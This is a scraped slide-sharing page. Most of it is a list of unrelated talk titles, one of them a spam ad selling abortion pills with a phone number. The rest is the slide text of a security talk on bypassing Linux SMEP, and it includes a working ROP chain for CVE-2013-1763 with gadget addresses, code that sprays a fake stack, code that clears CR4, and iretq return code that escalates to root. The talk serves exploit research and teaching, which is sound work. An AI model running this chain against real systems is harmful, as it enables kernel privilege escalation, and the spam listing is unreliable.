Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 

Último (20)

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 

Linux SMEP bypass techniques

  • 1. Practical SMEP bypass techniques on Linux Vitaly Nikolenko @vnik5287 vnik@cyseclabs.com
  • 2. Who am I? • Vitaly - @vnik5287 • Security researcher • Kernel exploit development • Kernel hardening techniques
  • 3. Agenda • Introduction (ret2usr) • SMEP bypass • SMEP, ROP, Spraying • CVE-2013-1763 (case study)
  • 4. ret2usr • Linux - kernel space on behalf of user space model • User space processes cannot access kernel space • Kernel space can access user space • ret2usr - redirect corrupted code or data ptr to code or data in user space
  • 5. ret2usr • Memory split • 0 to TASK_SIZE for user- space processes • 47 bits minus one guard page = 0x7FFFFFFFF000 • Corrupted function or data struct pointer • Redirect control flow to escalate_privs() in usespace Function ptr Data struct ptr ((1UL << 47) - PAGE_SIZE) escalate_privs() Data struct High mem addr Low mem addr Kernel space User space
  • 6. ret2usr Option #1 - corrupted function ptr • Find a function pointer to overwrite • mmap privilege escalation payload in user space: int __attribute__((regparm(3))) (*commit_creds)(unsigned long cred); unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred); commit_creds = 0xffffffffxxxxxxxx; prepare_kernel_cred = 0xffffffffxxxxxxxx; void escalate_privs() { commit_creds(prepare_kernel_cred(0)); } • Trigger the function
  • 7. ret2usr Privilege escalation • struct cred - basic unit of “credentials” • prepare_kernel_cred - allocates and returns a new struct cred • commit_creds - applies the new credentials
  • 8. ret2usr Option #1 - corrupted function ptr Function ptr ((1UL << 47) - PAGE_SIZE) escalate_privs() High mem addr Low mem addr Kernel space User space
  • 9. ret2usr Option #1 - corrupted function ptr • What function pointer to overwrite? • ptmx_fops • int fd = open("/dev/ptmx", O_RDWR); • fsync(fd); • perf_fops • int fd = sys_perf_event_open(…); • fsync(fd); • grep -E ‘_ops$|_fops$’ /boot/System.map*
  • 10. ret2usr Option #2 - corrupted data struct ptr • Create a fake data structure “A” in user space • Overwrite the function ptr “A.ptr” with priv esc code (also in user space) • Trigger the function
  • 11. ret2usr Option #2 - corrupted data struct ptr struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs()
  • 12. ret2usr • When escalate_privs() completes: • retq (stack is not modified) • system(‘/bin/sh’) —> # • clean exit
  • 13. SMEP
  • 14. SMEP • Supervisor Mode Execution Protection “The processor introduces a new mechanism that provides next level of system protection by blocking malicious software attacks from user mode code when the system is running in the highest privilege level.“ - 3rd Gen Intel Core (Datasheet, Volume 1)

  • 16. SMEP • Bit 20 (CR4 register) is set 1 • CR4 register value 0x1407f0 = 0001 0100 0000 0111 1111 0000 Intel® 64 and IA-32 Architectures Software Developer’s Manual Vol 3
  • 17. SMEP • If CR4.SMEP = 1, instructions may not be fetched from any user-mode address. (according to Intel) • CR4 register can be modified using standard MOV instructions • Clear the SMEP bit: mov $0x1407e0, %cr4
  • 18. SMEP • Check if SMEP is enabled: • cat /proc/cpuinfo | grep smep # (no root required) • Disable SMEP (“nosmep” kernel parameter) • Hypervisors • Xen, VMWare - SMEP support • VirtualBox, Hyper-V - no SMEP support • VMWare - virtualHW.version “8” or below - no SMEP support
  • 21. ROPing • vmlinux vs vmlinuz? • Kernel debugging RPM, DEB, etc. • https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux • ./extract-vmlinux /boot/vmlinuz-… > elf.bin • Finding gadgets • objdump -d ./vmlinux (aligned addresses only) • ROPgadget http://shell-storm.org/project/ROPgadget/ • ./ROPgadget.py --binary ./vmlinux > rop.txt # Intel syntax
  • 22. ROPing IA32 language density • Almost any sequence of bytes can be interpreted as an instruction 0f 94 c3; sete %bl
  • 23. ROPing IA32 language density • Almost any sequence of bytes can be interpreted as an instruction 0f 94 c3; sete %bl 94 c3; xchg eax, esp; ret
  • 24. Stack Pivots • mov %rsp, %rXx ; ret • add %rsp, … ; ret • xchg %rXx, %rsp ; ret • xchg %eXx, %esp ; ret (on a 64-bit system) • will land in user-mode memory • rax = 0xffffffffdeadbeef; rsp <— 0xdeadbeef
  • 25. Stack pivot - NX address Exploit attempt? Why yes it is…
  • 26. SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
  • 27. SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
  • 28. SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
  • 29. SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
  • 30. SMEP Bypass • FAKE STACK payload • Option #1: disable SMEP and execute escalate_privs() in user space • Option #2: disable SMEP and execute commit_creds(prepare_kernel_cred(0)) using ROP
  • 31. SMEP Bypass Option #1 POP XXX; RET High mem addr Low mem addr CR4_VALUE ^ 0xFFFFF MOV XXX, CR4; RET ESCALATE_PRIVS() in userspace
  • 32. CR4 register • How to get the value of the CR4 register? • Option #1 - hardcoded (0x1407f0) • gdb - no support • Look at kernel oops • Option #2 - ROP chain MOV %CR4, %REGISTER XOR %REGISTER, $0xFFFFF MOV %REGISTER, %CR4
  • 33. Fake stack • xchg %eax, %esp; ret • rax = 0xffffffffdeadbeef; rsp <— 0xdeadbeef • Prepare fake stack at 0xdeadbeef in userspace
  • 34. Fake stack • What if we don’t control %rax or %eax when pivoting? • %rax <— random value • Allocate ~4GB - mmap_min_addr to 0xFFFFFFFF and spray it with our ROP payload
  • 35. Fake stack Spraying ROP INSTR 1 0xFFFFFFFF 0x10000 ROP INSTR 2 ROP INSTR 3 … ROP INSTR 1 ROP INSTR 2 ROP INSTR 3 …
  • 36. Fake stack Spraying ROP INSTR 1 0xFFFFFFFF 0x10000 ROP INSTR 2 ROP INSTR 3 … ROP INSTR 1 ROP INSTR 2 ROP INSTR 3 …
  • 37. Fake stack Spraying • May land in the middle of our ROP payload • Will likely page fault! • An alternative is to spray the stack with an %rsp- advancing gadget: • pop %xxx; ret • nop; ret
  • 38. Fake stack Spraying POP RAX; RET 0xFFFFFFFF 0x10000 POP RAX; RET POP RAX; RET … POP RAX; RET ROP INSTR 1 ROP INSTR 2 ROP INSTR 3 …
  • 39. PART 2 - CVE-2013-1763
  • 40. Target • Ubuntu 12.04.02 > uname -a Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux • Ivy Bridge+
  • 41. CVE-2013-1763 SOCK_DIAG • Affected kernel versions: 3.3 - 3.8 • Trivial out bounds array access • Public exploit code available (32 bit?)
  • 45. CVE-2013-1763 SOCK_DIAG sock_diag_handl ers[45] ((1UL << 47) - PAGE_SIZE) struct sock_diag_handler { __u8 family; int (*dump)(void *a, void *b); }; High mem addr Low mem addr Kernel space User space 0x1ad38
  • 46. CVE-2013-1763 SOCK_DIAG sock_diag_handl ers[45] ((1UL << 47) - PAGE_SIZE) struct sock_diag_handler { __u8 family; int (*dump)(void *a, void *b); }; High mem addr Low mem addr Kernel space User space 0x1ad38 xchg %eax, %ebp ret 0xffffffff81ad2c32
  • 47. CVE-2013-1763 SOCK_DIAG sock_diag_handl ers[45] ((1UL << 47) - PAGE_SIZE) FAKE STACK High mem addr Low mem addr Kernel space User space 0x1ad38 xchg %eax, %ebp ret 0xffffffff81ad2c32 struct sock_diag_handler { __u8 family; int (*dump)(void *a, void *b); }; 0x35000000 0x45000000
  • 48. CVE-2013-1763 SOCK_DIAG • Map the fakestack area in user-space: • 0x35000000 - 0x45000000 • fakestack = mmap((void*)0x35000000, 0x10000000, 7| PROT_EXEC|PROT_READ|PROT_WRITE, 0x32, 0, 0)) • Spray the fakestack with: • pop rax; ret for (int p = 0; p < 0x10000000/sizeof(void*); p++) *fakestack ++= 0xffffffff8100ad9eUL; // pop rax; ret
  • 49. CVE-2013-1763 SOCK_DIAG ptr = (unsigned long *)(fakestack + 0x10000000 - 0x1000); *fakestack ++= 0xffffffff8133dc8fUL; // pop rdi; ret *fakestack ++= 0x407e0; // CLEAR SMEP BIT *fakestack ++= 0xffffffff810032edUL; // mov cr4, rdi; pop rbp; ret *fakestack ++= 0xdeadbeef; // dummy placeholder *fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode
  • 50. CVE-2013-1763 SOCK_DIAG • What about the stack ptr? • iret it! static void saveme() { asm( "movq %%cs, %0n" "movq %%ss, %1n" "pushfqn" "popq %2n" : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"); }
  • 51. CVE-2013-1763 SOCK_DIAG static void restore() { asm volatile( "swapgs ;" "movq %0, 0x20(%%rsp)tn" "movq %1, 0x18(%%rsp)tn" "movq %2, 0x10(%%rsp)tn" "movq %3, 0x08(%%rsp)tn" "movq %4, 0x00(%%rsp)tn" "iretq" : : "r" (user_ss), "r" ((unsigned long)0x36000000), "r" (user_rflags), "r" (user_cs), "r" (shell) ); }
  • 52. DEMO - ROP BYPASS